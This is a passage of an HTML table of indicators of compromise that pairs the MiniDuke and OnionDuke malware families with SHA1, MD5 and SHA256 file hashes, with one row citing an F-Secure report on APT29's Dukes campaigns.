<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A32817E9FF07BC69974221D9B7A9B980FA80B677</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1528567b1a2f1da31d602ce1ddfd8918</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d457e4189017712917c5c8f900bb9072c5910c9f975c50337115f952d885635</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A4E39298866B72E5399D5177F717C46861D8D3DF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1de51ec5d2b8466f0d424e1c8dcd6454</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1db9187b7b0e5bc97aca233f29b96295c0bc4058fdcff50df543c1f044e58836</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A6C18FCBE6B25C370E1305D523B5DE662172875B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b68677e04fcc9103560bb0a5e5c7303f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">94d39845ec228ff1c84668207c4591ae0e2b6605bdf11e84916534ab09744736</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A9E529C7B04A99019DD31C3C0D7F576E1BBD0970</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d2f39019bfa05c7e71748d0624be9a94</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">19580f275b82ee091bdc3028e6e5018fdcc915fe7853d4151b44f3d7e101e531</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">AD9734B05973A0A0F1D34A32CD1936E66898C034</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a58e8e935341b6f5cc1369c616de3765</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b96b07528f762dfcb9d6936995ed4e358d29542ae756f6e5547fa3b5b7797b6</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B27F6174173E71DC154413A525BADDF3D6DEA1FD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">270ca8368cd4216b1813281d3efe485d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ae4cc6834e3679e99fc93d2f5fba02167a31cf5b68a5a9ca7aa1a4b9f7cb4ae</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B8B116D11909A05428B7CB6DCCE06113F4CC9E58</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e48fb57ce3d9c56ca3cf6c4aed8ad0ea</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">415f88765b88dd90e5b0502e4fa1408e06ac9552c7c8974a510e6e23a9756a45</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C17AD20E3790BA674E3FE6F01B9C10270BF0F0E4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1c658719e6dedb929a6d85359c59682d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91b97f3b8ef8ebc8bbd06e06927e7b38090c026f8fca77e209e69c056b042cb7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C39D0B12BB1C25CF46A5AE6B197A59F8EA90CAA0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2d87ab160291664d62445548a2164c60</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23486eedb5fe8a026f602507f490b4df4721e8befa65007b84c4f5b1ed95e1bd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C6D3DAC500DE2F46E56611C13C589E037E4CA5E0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">527537cc28705e01af8d8006ae8308a9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c2409d415e66faebf0a031350b44d5a014ab4f62f2c1a3115982d452b7f97b9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CB3A83FC24C7B6B0B9D438FBF053276CCEAACD2E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">612fba96383a5098c26fe1a222e1e755</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2f9834f7b7fe09d98ef7b27d3828691ed4b361d1ccbbf8e10703f9ec03b05259</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CC3DF7DE75DB8BE4A0A30EDE21F226122D2DFE87</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">810de1b9fa0a9396acae23dcd113a60d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7815e5275ea849a9ed1f193abd8781ff7ae6b88ef6282f6a0900175a4bb59131</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CD50170A70B9CC767AA4B21A150C136CB25FBD44</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2530f54b87508e6f09a6bc5ab863b5db</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56dfc5905e7dfc67912ed164dc68c0806fdd3d7cd151415aaffcc1b7ab2f1a84</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CDCFAC3E9D60AAE54586B30FA5B99F180839DEED</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7040ee4cd4be4b84f8510c04663a2500</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e375d40412845c4476536307f28b64c0128e1cb88a3f505bafdcd013d542fa85</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D22D80DA6F042C4DA3392A69C713EE4D64BE8BC8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b798c968cbfd53f878e13c7698610d9c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">12a057ca7c92cda3cd0e09efc5bff2ebd3f7d2991e999038c7f31a6ac6a95c3d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D81B0705D26390EB82188C03644786DD6F1A2A9E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f19345e0e5aecc0da45b4c110591bdd9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b55e6e10a7f46c97cd247028287ea664bacf7ec7e500a4bf4f53c9dea7625426</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">DE8E9DEF2553F4D211CC0B34A3972D9814F156AA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1e1b0d16a16cf5c7f3a7c053ce78f515</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a1015f0b99106ae2852d740f366e15c1d5c711f57680a2f04be0283e8310f69e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E4ADD0B118113B2627143C7EF1D5B1327DE395F1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18e64b8e5ce5bdd33ce8bd9e00af672c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b1584a6f1059ad1c24bde2a9a8ae83ffc6679eb531d30f3f1c69f81e3a3819dc</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E95E2C166BE39A4D9CD671531B376B1A8CEB4A55</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f78f1359fcf04e89e3bb0fbdf74c1e05</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f2ede48413704b3efc4d629d3db1a1331352a0afb0d91683640dc4b4af2921d1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EDF74413A6E2763147184B5E1B8732537A854365</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8282eb6d6f20c5de6e7f4ae3a42438d2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fe2672737205351df003e1969ef1ef0df9e13a9a31bf77f844236857ed0b0bf5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EFCB9BE7BF162980187237BCB50F4DA2D55430C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">935892bb70d954efdc5ee1b0c5f97184</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a962ea9027514712ba3949dc3ca54559d1d42e116837dda5f9809d6523a41255</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F62600984C5086F2DA3D70BC1F5042CF464F928D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">381691b297f7f5694709e21ad61ec645</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">13a50942322977d6471f71debc6d3db38807d88778366bae6cfcae45823a17f8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">073FAAD9C18DBE0E0285B2747EAE0C629E56830C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1aa8a941ec22a3ffe32d079323a2e6c4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0474111e44b9aa56d6e6024c6f278e915d57b7862ceb927672fc3417f76a3ba3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">145C5081037FAD98FA72AA4D6DC6C193FDB1C127</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e1db6b72ec26311b175663b7d88e3c00</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">930939256e2c2fa30e7260897d96859c08cf767664e4bd3cedf156b6765b5413</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">16B632B4076A458B6E2087D64A42764D86B5B021</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">af534ba7bfc624c76e718ceab3477118</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ef0fab7757a6b5e842297fa2e0dc7a7ce084278c5d12b878bba7d90759a0e22b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E200FBB02DC4A51EA3EDE0B6D1FF9004F07FE73</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9993445521ca03ac3a693625b5ca1f36</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3877a522c924f834e442ef19d9b11ab6d3385849e60d5f310f6320e2d9e42804</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">22BAE6BE13561CEC758D25FA7ADAC89E67A1F33A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b602adb677d0560601e7668eaf158605</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a9e2d988781e970882fb1cee420bf01dda30730046a82f0faf4703523842feb5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">25E0AF331B8E9FED64DC0DF71A2687BE348100E8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0753697172046fcfb03d6445fff1f093</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd589360b299dc4803aa35abca527137a51feadae2b1e3bc2b5a301bb5b245da</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3BF6B0D49B8E594F8B59EEC98942E1380E16DD22</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d26ff50f81e76dffd1382fbf16783b47</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65a2ca760bfce4762cd1cb3623c7d5d0ff86187d3bf3ba8fdea1339585a57ec2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42429D0C0CADE08CFE4F72DCD77892B883E8A4BC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4649609b8394283ec36ada132b02a0c6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">567332c2a6813d529bcb9196102ad45eceb982143e9d2f326f02cec1511954b0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5CCFF14CE7C1732FADFE74AF95A912093007357F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">89b3cf1023825cc49efe59b06092dba1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d07a802eb6d2c296c3f1bc726b5a716c4a7d8e97053c53e81658a31f969e6ce7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">61283EF203F4286F1D366A57E077B0A581BE1659</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">db9ccc6fa0f7605f39d93487fbaba866</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">540913b3647c28a14418a6f288be9e4d8f99048227efea8ca1b13877269002eb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B3B42F584B6DC1E0A7B0E0C389F1FBE040968AA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65c40b01a0870250fb358efc8b201192</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c218b779461d83d70791e0578175503cd69128c9723f2c5d7d36b85073b0f2f9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B631396013DDFD8C946772D3CD4919495298D40</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4c77494cccb41aaa8849176bd58055e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97afcd01e00d32dc4d1161d7a127933593cfc092ec635af5dc7a775a088b6091</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7B3652F8D51BF74174E1E5364DBBF901A2EBCBA1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">19aca5da05ee8e5862e1d1ee50e84cec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">df818c2dccacc532ba0205749329b7e46d1f6616b40da55e0d994105bd988bd2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7D17917CB8BC00B022A86BB7BAB59E28C3453126</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9e3f3b5e9ece79102d257e8cf982e09e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d86c0985530271618a342579afd1a9ecb27dfb080866e3b888bd3e45e1eb8f5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7D871A2D467474178893CD017E4E3E04E589C9A0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3a6b45a7c8fa74bc342b69e926079960</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3af9cfb2797bed22e1d12970d068d794270a0f07d3f3dcfdcdb9abfc3a80e0f8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7EFD300EFED0A42C7D1F568E309C45B2B641F5C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6a5a0ac42161333e9758589ecabed3c6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c47f2973f077f21abfb202b54ea18ee2a182e4305ee0046c1bc6d15a1179a43c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91CB047F28A15B558A9A4DFF26DF642B9001F8D7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ccb6d74a8577ca44ca56cfc7fa6332b6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">49dca913ff5c4782e8f8fa2dfd161110bc5c8cd36c9ce8aa0efd1860ab668e6e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9A277A63E41D32D9AF3EDDEA1710056BE0D42347</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0ea4ccf2737f7095b367eda58e475e1f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">489d448514a3ddf30144cc1634e6623e529dd3aee54a050a920a3d4342b4b96a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A75995F94854DEA8799650A2F4A97980B71199D2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">28f96a57fa5ff663926e9bad51a1d0cb</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">19972cc87c7653aff9620461ce459b996b1f9b030d7c8031df0c8265b73f670d</span></td></tr>
